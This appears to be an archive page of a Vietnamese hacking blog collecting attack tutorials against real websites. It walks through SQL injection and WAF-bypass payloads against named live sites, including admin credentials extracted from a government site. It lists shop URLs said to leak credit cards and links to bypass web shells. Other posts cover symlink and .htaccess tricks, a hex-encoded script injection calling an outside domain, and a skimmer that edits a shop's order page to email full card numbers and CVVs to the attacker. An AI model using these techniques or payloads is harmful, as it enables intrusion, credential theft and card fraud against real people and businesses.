( Pass unlock: soleil_vhb, pass dải nén nếu có : ceh.vn )

- * Đối với các server không có chức năng run command và cũng không cho chạy shell cgi thì có thể sử dụng các shell sau để bypass đơn giản đối với 1 số server.

+ facesymlink.php
http://www.mediafire.com/?fc9kencnilx0rm4 ( 5.2.12 -> 5.3.1
http://www.mediafire.com/?kmid8rahl5wjh74 ( version 5.3 -> 5.4 )

+ 529bypass.php
http://www.mediafire.com/?cls0e5k873w83ef

+ Bypassnull.php
http://www.mediafire.com/?1x0zxmig5ctwezr

+ Hoặc sử dụng safe mode bypass
http://www.mediafire.com/download.php?38d13jgqw132db2

+ Sử dụng các chức năng bypass trên con shell r57vip này ( nên convert domain sang dạng ip)
http://www.mediafire.com/?sqjs5du3srlifqt

+ Hoặc sử dụng via sqli
v.v….

(Tất cả các shell download trên đều có pass unlock: vhb_soleil và pass dải nén nếu có: ceh.vn)

Trong bài tut trên soleil đã giới các phương pháp local attack cơ bản và các dạng bypass cơ bản nhất có thể sử dụng. Trong bài tiếp theo soleil sẽ đề cập đến các dạng bypass nâng cao đối với 1 số server khó, các thủ thuật vượt chmod qua 400 permission, chiếm quyền điều khiển root (get root) và các kỹ thuật up shell đối với 1 số mã nguồn mở như: joomla, worpress, nukeviet, vbulletin, drupal……
readmore...

Hướng Dẫn bug SQL và khắc phục khi gặp lỗi !

1.Bước đầu tiên trong khi khai thác SQL chính là tìm lỗi:Có các cách tìm lỗi sau :
- Thêm dấu ' vào trang web trả về :

Quote:
Quote: You have an error in your SQL syntax,supplied argument is not a valid MySQL
Quote:
Quote:
warning mysql_num_rows supplied argument is not a valid mysql result resource
Thì chắc chắn là trang web đã bị lỗi SQL
-Thêm dấu ' vào , trang web trả về trang trắng hoặc một phần của trang thì nguy cơ trang đó dính lỗi là rất cao --> thử khai thác tiếp
-Thêm and 1=1 và 1=0 , trang web trả về trang trắng hoặc một phần -> dính lỗi
2.Tìm số field,column:Ta sử dụng câu lệnh order by để tính số field , số column trong cơ sở dữ liệu SQL
Để tiết kiệm thời gian các bạn order by để xác định khoảng rồi tìm ra số column
-Nếu order by 100-- - mà trang web đưa về lỗi
Quote:
Quote:
Error: Unknown column '100' in 'order clause'
Quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Thì các bạn tiếp tục giảm dần xác định khoảng rồi tìm ra
-Nếu order by 100-- - mà nó vẫn ra nguyên trang ban đầu thì các bạn thử thêm dấu ' sau phần id xem , nếu nó ra lỗi thì tiếp tục giảm dần để xác định khoảng
-Nếu cả 2 cách trên không được thì bạn ko dùng order by nữa , chuyển sang union select để tìm luôn ( cách này hơi mất thời gian )
3.Tìm số lỗi:Bạn dùng lệnh union select để tìm ra số lỗi .
-Nếu nó hiện ra số lỗi bình thường thì các bạn tiếp tục khai thác thôi
-Nếu nố không hiện ra số lỗi thì các bạn có thể thực một trong các cách sau :
+Viewsource để tìm số lỗi
+Xem các hình ảnh để tìm số
+Thay các column bằng null : null,null,null
+Thấy số id bằng null hoặc false
+Một số trường hợp khi bạn bỏ dấu - trước số đi lại có thể thấy số lỗi
+Dùng + hoặc alt + 255 thay cho dấu cách , viết hoa UNION SELECT
4.Khai thác

-Get thông tin về user , data , version
+Các bạn get version để biết hướng khai thác (MySQL ver 4 hoặc 5) : version() hoặc @@version hoặc có thể là convert(version() using latin1)
+Get user vầ database tương tự
-Get table và column
+Gat table : đối với MySQL 4 thì ta chỉ có thể đoán , mình đang tổng hợp lại các table và column hay dùng , còn đối với MySQL 5 thì chúng ta khai thác như sau
union select unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema=datase()
+Get column : UNION SELECT GROUP_CONCAT(COLUMN_ NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME=0xtable_name
Convert table_name sang hex hoặc cũng có thể dùng CHAR(...)

5.By pass

-Khi query một số site nó chặn các hàn union , select , convert ,.... thì khi query nó trả về trang trắng , lúc này ta thấy đổi bằng các chữ hoa thường xen kẽ nhau :uNiOn , SeLeCt ,CoNvErT ,....
-Khi query nó trả về lỗi

Quote:
Quote:
Forbidden
You don't have permission to access /... on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
hoặc
Quote:
Quote:
Not Acceptable
An appropriate representation of the requested resource / could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request
thì ta thay thế union hoặc select bởi /*union*/ hoặc /*!union*/ ( /*select*/ hoặc /*!select*/)

-Khi query nó trả về lỗi

Quote:
Quote:
406 Not Acceptable
This request is not acceptable Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!
thì ta thay thế space bởi %0A
-Khi query nó trả về lỗi
Quote:
Quote:
Error 500: Internal Server Error
The server encountered an unexpected condition which prevented it from fulfilling the request.
The problem is on the server side, not with your browser or the address. Most probably, a certain service (e.g., Tomcat engine) is down. Please contact your webmaster.
thì các bạn query id=.. and (select 1)=(select 0xAAAAAAAAAAAAAAAA 1000 A nhé) union select 1,2,3....
readmore...

Thứ Hai, 16 tháng 7, 2012

[TOOL] Dò table với lỗi JET DATABASE

TOOL dò TABLE của lỗi JET of SQL INJECTION.
(Lỗi JET mà ngồi mò table thì hơi bị cực,nên xài soft cho lẹ,hj`hj`).
Nếu pro nào có rồi thì thôi,em chỉ hỗ trợ Newbie (như em) thôi.

**HƯỚNG DẨN :
- Đơn giản vô cùng,giải nén và chạy file "JetSQL.exe" để Dò
- Sát bên có file "tablename.txt" để chứa tên các table mà nó sẽ dò (bạn có thể sưu tầm thêm tables bỏ vào đó).

LINK : http://www.mediafire.com/?33gwbbs956h7w3r
readmore...

Thứ Ba, 10 tháng 7, 2012

Video Local Sieutocdo.com

readmore...

TUT Hack CC

allinurl: /sub.php?Page=1
chuyển về dạng
http://abc.com/detail.php?pid=....
hack bằng tool hoangduye cũng được mà havij cũng được,hack bằng cái gì cũng được

get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)

link admin
http://abc.com/admin_login.php

http://abc.com/cp
vào admin phần category up shell lên để đuôi php hoặc .jpg.php tùy thích

tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php

vào shell tìm file đó

sau đó tìm đoạn này

<? echo

"" . substr($card_no,-4) . "<br>" .

$ex_month . "/" . $ex_year . "<br>" .

$cid;

?>
thường thì code gốc là hiện 4 số cuối của cc

sửa số màu đỏ thành số 0

sau đó gán thêm hàm này vào phía dưới
<?

$to = 'tmtno1@vnhack.us';

$subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .

'X-Mailer: PHP/' . phpversion();

mail($to, $subject, $message, $headers);

?>
notice : do file order chính mã hóa nên hack cc bằng cách sử file nối đến file order chính,cc k đảm bảo live 100%,chuẩn bill 100%

có shop thì có thể xem đc cc mã hóa qua admin,có shop thì k lưu lại cc nên phương pháp hack = shell này nhanh gọn lẹ nhất
readmore...

Symljnk bypass view file.php

Cpanel (:2082)

ln -s / dmx.txt
tar -zcvf cpanel_dmx.tar.gz 
direct admin(:2222)
ln -s / r00t
tar -zcvf direct_r00t.tar.gz r00t
có quyền login host và giải nén thư mục ra
chạy trên address
cpanel : http://shell_on_this_host_/dmx.txt/home/user_victim/public_html/index.php
direct : r00t/home/user_victim/domains/public_html/index.php

.htaccess

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php 
con .htaccess này có chức năng show ra các file.php dưới dạng file text
nên cho dù permisson thư mục nhưng đên file này vẫn có thể view
hoặc show ra cả file.html
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any 
Download : http://www.mediafire.com/?bt7x83mj8qzpx92
readmore...

Video Hack CC cho Newbie :P

Download : http://www.mediafire.com/?drhi5o3nsc9tblt

concat((0x3c736372697074207372633d22687474703a2f2f6d756173756e67323031322e636f6d2f73716c2e6a73223e3c2f7363726970743e))
readmore...

UpLoad Shell PHPMyadmin

Shell : http://121.247.167.36:9292/tmt6.php
Dork google :inurl:/phpmyadmin/sql.php?
Video : http://www.mediafire.com/?463c3r7k33f1vzx
readmore...

Hướng dẫn reg domain .ug full cp free

Sau đây em xin bày các bác ( bác nào chưa biết ) reg Domain .ug hoàn toàn free .
( TỰ REG NHÉ KHÔNG CÀN XIN XỎ MỌT AI )
Để các bác có 1 domain ưng ý và tự tập reg
Bác nào biết rồi thì đừng ném gạch em nhé .
DEMO : http://tyn-vnh.ug
--------------------------------------------------------------------------------------

1. Vào trang

www.registry.co.ug
đền tên miền muốn reg rồi an NEXT

2. Tên miền được chấp nhận . việc tiếp theo bạn điền thông tin vao
Bạn điền j vào cũng được

*LƯU Ý : - điện chie email phải chính xác
- NIC handle : CM260

3. Ở mục Registration Period bạn chọ 2 year
Thanh toán chọn là PayPal

4. Bỏ qua phàn host và các mục còn lại của nó ( không cần ) .

5. Đăng ký xong nó chuyển qua cổng thanh toán của PayPay. Tắt cửa sổ đấy đi là anh em đã có 1 tên miền .UG miễn phí rồi đó

6 . Xong phan reg domain .ug bây giờ là tới phần quan lý domain và trỏ dns về host

7. Vào mail xem thong tin domain và đăng nhạp quản lý cp domain

8. Trỏ DNS Ở mục DNS Information

DNS Information

Nameserver 1: ns1.cfi.co.ug
IP Address: 174.123.87.162
Nameserver 2: ns2.cfi.co.ug
IP Address: 174.36.245.66
Nameserver 3: ns3.cfi.co.ug
IP Address: 70.86.110.10
Nameserver 4: ns24.cfi.co.ug
IP Address: 212.88.97.141

***
Bây giờ bạn hảy thay Nameserver và IP Address của nó thành chủa mình
Ví dụ : DNS sang PAVIETNAM.VN : ns1.pavietnam.vn và ns2.pavietnam.vn

Nameserver 1: ns1.pavietnam.vn
IP Address:
Nameserver 2: ns2.pavietnam.vn
IP Address:
Nameserver 3:
IP Address:
Nameserver 4:
IP Address:

Trỏ DNS lần thứ nhất không được thì bạn trỏ lần thứ 2 ( ok ) xem mail
Việc xác định DNS chờ mất vài tiếng thì domain mới hoạt động .
readmore...

[TUT] Khai thác SQL inject cookie method: Session based

tool cần có: cookie manager dành cho firefox (tôi thích dùng firefox).

Code:
https://addons.mozilla.org/vi/firefox/addon/cookie-manager/
sau khi tiến hành cài đặt sẽ có biểu tượng CM bên góc trên bên phải
Victim:
đi vào luôn 1 em trong challegen
Code:
http://zerocoolhf.altervista.org/level4.php?id=1
trước khi vào exploit tôi cũng xin nói luôn
khai thác với cách thông thường là rẩt khó nó filter hầu như tất cả.
khai thác qua session based em nó chỉ filter khoảng trắng.
Vào khai thác thôi:
bước 1 : tất nhiên là mở em nó lên rồi

bước 2 : dung firefox mở trang victim lên.
sau khi mở được trang web ta đã có 1 cookie. click vào tag Monitor Cookie
click vào link của victim ngay chỗ value = 1 .
ta khai thác ở đó.

bước 3: tiến hành inject:
Cách sử dụng: bạn phải save lại rồi mở lại link.
bypass khoảng trắng= %0b
Code:
1'%0border%0bby%0b3--%0b-

bước 4: các bạn tự làm
End tut.
readmore...

Chủ Nhật, 8 tháng 7, 2012

[Site SQL]Vài site lỗi SQL có creditcard :D

 http://www.ga-k9.com/customer_testimonials.php?testimonial_id=10
 http://collards.co.za/customer_testimonials.php?'&testimonial_id=14
 http://www.healthbeyond2000.co.nz/shop/customer_testimonials.php?testimonial_id=1
 http://www.gocookie.com/customer_testimonials.php?testimonial_id=7
 http://www.ga-k9.com/customer_testimonials.php?testimonial_id=10
 http://collards.co.za/customer_testimonials.php?'&testimonial_id=14
 http://www.healthbeyond2000.co.nz/shop/customer_testimonials.php?testimonial_id=1
 http://www.gocookie.com/customer_testimonials.php?testimonial_id=7
 http://www.supermagnetman.net/customer_testimonials.php?testimonial_id=3
 http://www.elementcable.com/catalog/customer_testimonials.php?testimonial_id=67
 http://www.gocookie.com/customer_testimonials.php?testimonial_id=5
 http://www.multigyn.com/customer_testimonials.php?testimonial_id=4
 http://www.kukukakikukakukaku.com/hacking-with-sql-injection.sonk
 http://www.4ushops.co.nz/customer_testimonials.php?testimonial_id=31
 http://supercheappc.co.nz/site/customer_testimonials.php?testimonial_id=4
 http://www.falseeyelashesstore.com/customer_testimonials.php?'&testimonial_id=8'&osCsid=85ed4052623c4d75a19ed7ab462c1904
 http://supercheappc.co.nz/site/customer_testimonials.php?testimonial_id=17
 http://www.supermagnetman.net/customer_testimonials.php?testimonial_id=2
 http://reflectionsofhonor.com/catalog/customer_testimonials.php?testimonial_id=9
 http://www.dollsupply.com/shop/customer_testimonials.php?testimonial_id=13
 http://www.4ushops.co.nz/customer_testimonials.php?testimonial_id=19
 http://www.autographdealer.com/customer_testimonials.php?testimonial_id=5
 http://www.gpsparatodos.com/customer_testimonials.php?testimonial_id=43'&'&testimonial_id=71'&osCsid=8fad3764b48dff9bf101e46caecbb508
 http://www.autographdealer.com/customer_testimonials.php?testimonial_id=5
 http://www.boardsandbits.com/product_info.php?products_id=13977
readmore...

[TUT] - Bypass SafeMode sử dụng Python

readmore...

[TUT]Khai thác site SQL HTML (php biến dạng)

Khai thác sql không phải là php nữa mà là HTML.

victim lần này là:
HTML Code:
http://www.worldwidehealthcenter.net/articles-261.html
Thêm dấu ' vào sau những con số
HTML Code:
http://www.worldwidehealthcenter.net/articles-261'.html
haha lỗi rồi

Quote:
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16

Warning: Cannot modify header information - headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432
Bắt đầu order by
HTML Code:
http://www.worldwidehealthcenter.net/articles-261 order by 1-- -.html
>>ok
HTML Code:
http://www.worldwidehealthcenter.net/articles-261 order by 7-- -.html
>> ok
HTML Code:
http://www.worldwidehealthcenter.net/articles-261 order by 8-- -.html
>> bao loi

>>8-1=7 nhé

bây h union select :
HTML Code:
http://www.worldwidehealthcenter.net/articles-261 union select 1,2,3,4,5,6,7-- -.html
ui số má đâu hết rồi: , view source , chẳng thấy gì hết chán.

Ghét quá thay số bằng null xem 261=null

http://www.worldwidehealthcenter.net/articles-null union select 1,2,3,4,5,6,7-- -.html

ui ra rồi 2 và 3 nhé

Tìm các thông tin :version(),database(),user()

HTML Code:
http://www.worldwidehealthcenter.net/articles-null union select 1,2,version(),4,5,6,7-- -.html
Tiếp theo tìm table name
HTML Code:
http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- -.html
1 đống :
Quote:
adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers
Tìm table chứa thông tin

Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé
member=0x6d656d626572 (conver to hex nhé)
get column

HTML Code:
http://www.worldwidehealthcenter.net/articles-null   union select 1,2,group_concat(column_name),4,5,6,7 from   information_schema.columns where table_schema=database() and   table_name=0x6d656d626572-- -.html
lại ra 1 đống :
Quote:
id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e
readmore...

[TUT] - SQL - Startourvn.com

Download: http://www.mediafire.com/?pu6e1s4jtfkphhn

Pass Unlock: vnhack
readmore...

[TUT] - Hack via MySQLDumper


Download: http://www.mediafire.com/?246qg078me46nio

Pass Unlock: vnhack
readmore...

[TUT]SQLI (căn bản)

bước 1:/ đương nhiên check site lỗi sqli nhưng làm sao để check? đơn giản chỉ cần thêm ' or '' or # tùy vào mọi lúc thui

Victim:http://www.xzs.gov.cn/productdetail.php?ID=10

ok ta thêm ' dzo nào

http://www.xzs.gov.cn/productdetail.php?ID=10'

ok nó sẽ bất thường phải ko

bước 2/ta order by ra để bik số nó lỗi ở đâu

http://www.xzs.gov.cn/productdetail.php?ID=10

http://www.xzs.gov.cn/productdetail.php?ID=10 order by 1<=không lỗi

http://www.xzs.gov.cn/productdetail.php?ID=10 order by 10<=không lỗi

http://www.xzs.gov.cn/productdetail.php?ID=10 order by 100<= không lỗi @@ diss @@ vậy thử cách khác bằng cách như sau

http://www.xzs.gov.cn/productdetail.php?ID=10' group by 1-- -<=không lỗi
http://www.xzs.gov.cn/productdetail.php?ID=10' group by 2-- -<=không lỗi
http://www.xzs.gov.cn/productdetail.php?ID=10' group by 3-- -<=không lỗi

.... order tự mình đi mệt quá

http://www.xzs.gov.cn/productdetail.php?ID=10' group by 12-- -<=không

http://www.xzs.gov.cn/productdetail.php?ID=10' group by 13-- -<=ok thấy sự bất thường rùi phải ko

3/ta union select nó nào

nhớ thêm - đằng sau id= nhé

www.xzs.gov.cn/productdetail.php?ID=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12-- -

không ra số lỗi rùi thử cách khác vậy

www.xzs.gov.cn/productdetail.php?ID=-10' union select 1,2,3,4,5,6,7,8,9,10,11,12-- -

ok nó ra số 2 8 9 10 11 6 và mấy số đó là để chúng ta get table+version() vân vân

4/ta check thử verison nó

www.xzs.gov.cn/productdetail.php?ID=-10' UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12-- -

oh 5.6.2-m5 có khi version 4. trở lên thì guess table thui @@

5/ khai thác table nó

bằng cách add

www.xzs.gov.cn/productdetail.php?ID=-10' UNION SELECT 1,version(),3,4,5,6,7,CONVERT(group_concat(table_n ame) USING latin1),9,10,11,12 from information_schema.tables where table_schema=database()-- -

ok nó ra 1 đống table rùi vậy ta sẽ check user +admin nó nhưng đa số là
:Admin,User,Users,Manager Ctril+f lên rùi tự coi

ok table nó là vn_adminusers
(hmm gov.cn mà nó đi để vn_adminusers .. thằng này nó yêu nước vn mình )

6/check columns nó nào

www.xzs.gov.cn/productdetail.php?ID=-10' UNION SELECT 1,version(),3,4,5,6,7,CONVERT(group_concat(column_ name) USING latin1),9,10,11,12 from information_schema.columns where table_schema=database() and table_name=0x766e5f61646d696e7573657273 -- -

=0x766e5f61646d696e7573657273 nhiều người hỏi cái này là gì cái này là hex của nó bằng cách vào site
http://string-functions.com/string-hex.aspx và chỗ enter cho cái table user or admin dzo rùi convert nó là có số ở dưới copy và paste dzo

Nhưng nhớ là phải có =0x nhé

ok adminuser_id,adminuser_name,adminuser_pass,adminus er_loginnum,adminuser_lastlogintime,adminuser_last loginip nó ra mấy table này vậy ta cùng get nào

7/get user+pass

www.xzs.gov.cn/productdetail.php?ID=-10' UNION SELECT 1,version(),3,4,5,6,7,CONVERT(group_concat(adminus er_id,0x2f,adminuser_name,0x2f,adminuser_pass) USING latin1),9,10,11,12 from vn_adminusers-- -

0x2f:là / cho dễ nhìn ấy

ok user+pass nó là : 1/mfykziwu/che173nxiao


8/get link admin

vậy chúng ta get bằng gì? off coz bằng tools rùi

tui thích nhất tools này


9/ không get dc admin vì chmod mẹ rùi nhưng thui tới đây hết chắc anh em cũng đủ hiểu

Hướng dẫn Bypass 1 số lỗi thường gặp:

Loại 403,406:
hi ta order by thành công , nhưng union select lại xuất hiện những dòng thông báo sau:
Quote:

406 Not Acceptable

This request is not acceptable Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!

Quote:

Forbidden

You don't have permission to access /htmls/recruitment_detail.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.vinaplast.com.vn Port 80

Quote:

Not Acceptable

An appropriate representation of the requested resource /detClientes.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.



Để vượt qua được cái này, thì chúng ta cần phải bypass nó, nếu bypass vượt qua xem như site này 90% là đã xong với mình
Sau đây là một số cách vượt qua:
Cách 1 : tùy biến union select
Tùy biến ở đây là các bạn điều chỉnh chữ HOA, chữ THƯỜNG, HOA THƯỜNG xen kẽ nhau
Cách 2: Thêm comment /*!...*/ , /*!50000...*/
Cách 3: Dùng encode URL, cách dùng như sau
ví dụ : ta encode union ,nhưng ta chỉ encode 1 phần hoặc tất cả chữ cái có trong union.
ta chỉ việc HEX nó và thêm đằng trước là %, chú ý là % chứ ko phải 0x đâu nhé

Cách 4: là khi xuất hiện khoảng trắng nó sẽ báo lỗi, ta thay khoảng trắng bằng dấu +, và 1 số trường hợp ta thay bằng : %0A,%0B,%0C,%0D,%09,%20...
Cách 5 : Kết hợp 4 cách trên lại với nhau
Cách 6: tự chế

Mẹo vặt để tìm ra từ khóa bị MOD_security:
Khi bypass union select thành công thì tới đoạn get table_name. Đoạn get table_name chắc chắn các bạn sẽ gặp trở ngại vì nó tiếp tục thông báo lỗi, do đó cách thức vựot qua cái này như sau :
Vi dụ site.com?tghmmd=1 order by 7-- - là ok. Và Union select ta đã bypass và cho ra số 3
Quote:

>>union select 1,2,3,4,5,6,7-- -

+Get table_name ta chưa vội thay table_name vào làm gì, mà thêm vào "from information_schema.tables" trước>> sẽ thành
Quote:

union select 1,2,3,4,5,6,7 from information_schema.tables-- -

Nếu nó báo lỗi thì hầu hết bypass như sau:
Thay tables = /*!table*/=/*!50000tables*/ hoặc from= /*!from*/=/*!50000from*/
Nếu nó ko báo lỗi thì ta đi tiếp,và thêm đoạn where table_schema=database()
-Nếu lại báo lỗi thì bypass như sau
Thay where=/*!where*/=/*!50000where*/ Hoặc = bằng like
Chú ý chỗ này, cái database() ,khi mà tìm version() mà nó chặn() thì chú ý chỗ này ta dùng tên cái database nhé

>>Khi đã thêm xong mà số column lỗi là 3 vẫn hiện ra là ta bypass ok rồi. Bây h chỉ việc thay cái table_name vào số 3 nữa là ok.
Nếu lỗi thì tiếp tục bypass như trên
table_name = /*!table_name*/ = /*!50000table_name*/


(nói chung SQLI phải biết biến hóa )
readmore...